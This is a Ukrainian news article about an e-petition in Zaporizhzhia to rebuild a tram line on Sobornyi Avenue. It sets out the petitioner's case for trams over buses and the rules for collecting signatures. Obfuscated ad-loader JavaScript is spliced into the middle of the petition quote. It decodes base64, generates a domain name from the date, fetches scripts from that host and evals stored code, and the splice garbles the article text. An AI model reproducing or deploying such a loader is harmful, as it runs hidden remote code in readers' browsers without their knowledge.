У Запоріжжі пропонують відновити трамвайне сполучення по проспекту Соборному

Відповідна ініціатива була розміщена на сайті Електронних петицій м. Запоріжжя.

Автор петиції, Зімін Ренат Дмитрович, пропонує побудувати на проспекті Соборному відокремленну трамвайну колію з високими платформами, бесшумними коліями та пустити по ній сучасні низькопідлогові багатосекційні трамваї.

СУТЬ ЕЛЕКТРОННОЇ ПЕТИЦІЇ

«На початку XXI століття з проспекту Соборного та інших центральних вулиць Запоріжжя абсолютно необґрунтовано була демонтована трамвайна колія. Тоді міська влада намагалася обґрунтовувати це тим, що без трамвайної колії дороги стануть ширшими, тож для автомобілів буде більше місця, хоча вже в той час такий підхід до організації міста був визнаний неправильним, нераціональним та причинним для багатьох проблем в майбутньому.

Так і виявилось: у мешканців будинків, близьких до проспекту Соборного прямо перед вікнами з’явилась шестисмугова авотомобільна дорога, а в людей, що користуються громадським транспортом, нема альтернатив переповненим автобусам та застарілими і визнаними вбивчими для транспортної системи міста маршрутними таксі.

Віддавати перевагу автобусному руху на завантажених маршрутах перед трамвайним (якщо він можливий) —показник непрофесіоналізму міської влади, тому пропоную побудувати на проспекті Соборному відокремленну трамвайну колію з високими платформами, бесшумними коліями та пустити по ній сучасні низькопідлогові багатосекційні трамваї. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Головний недолік автобусних систем є те, що вирішенням проблеми перевантаження автобусів буде придбання більших автобусів/випуск на лінію більшої кількості автобусів (що також потребує придбання більшої кількості транспортних засобів), а у випадку з трамваями буде достатньо збільшити кількість секцій, або випускати на лінію «здвоєні» вагони (СБЄ), тим самим дуже легко та дешево збільшуючи пропускну здатність системи в майбутньому.

Також, очевидним фактом є те, що поїздка на трамваї є більш «френдлі» до пасажира, ніж на автобусі, бо з трамваєм набагато легше облаштовувати зупинки, тому що трамвай «статичнічіший» відносно платформи, бо рухається по заздалегідь заданому шляху (на відміну від автобуса, де зручність посадки на зупинці залежить від водія), тому з ним легко використовувати пандуси, а зазори між платформою та входом можна майже повністю прибрати, та вони маневреніші, ніж автобус, а тим паче зчленований автобус. На відміну від них, рух трамваю набагато компактніший та менш аварійний», — аргументує свою позицію ініціатор петиції.

Наразі, петиція набрала 36 підписів з необхідних 750. До кінця голосування залишився 21 день.

Підтримати петицію можна за ПОСИЛАННЯМ.

Нагадаємо, збір голосів на підтримку петиції триває 60 календарних днів. Якщо за цей час петиція набере 750 і більше голосів громадян, вона буде передана на розгляд постійної депутатської комісії Запорізької міської ради, предметом відання якої є порушене автором петиції питання, та до профільних виконавчих органів міської ради. Якщо петиція не набере необхідну кількість голосів впродовж вказаного терміну, вона розглядається як звернення громадян відповідно до Закону України Про звернення громадян. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/u-zaporizhzhi-proponuyut-vidnoviti-tramvajne-spoluchennya-po-prospektu-sobornomu/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top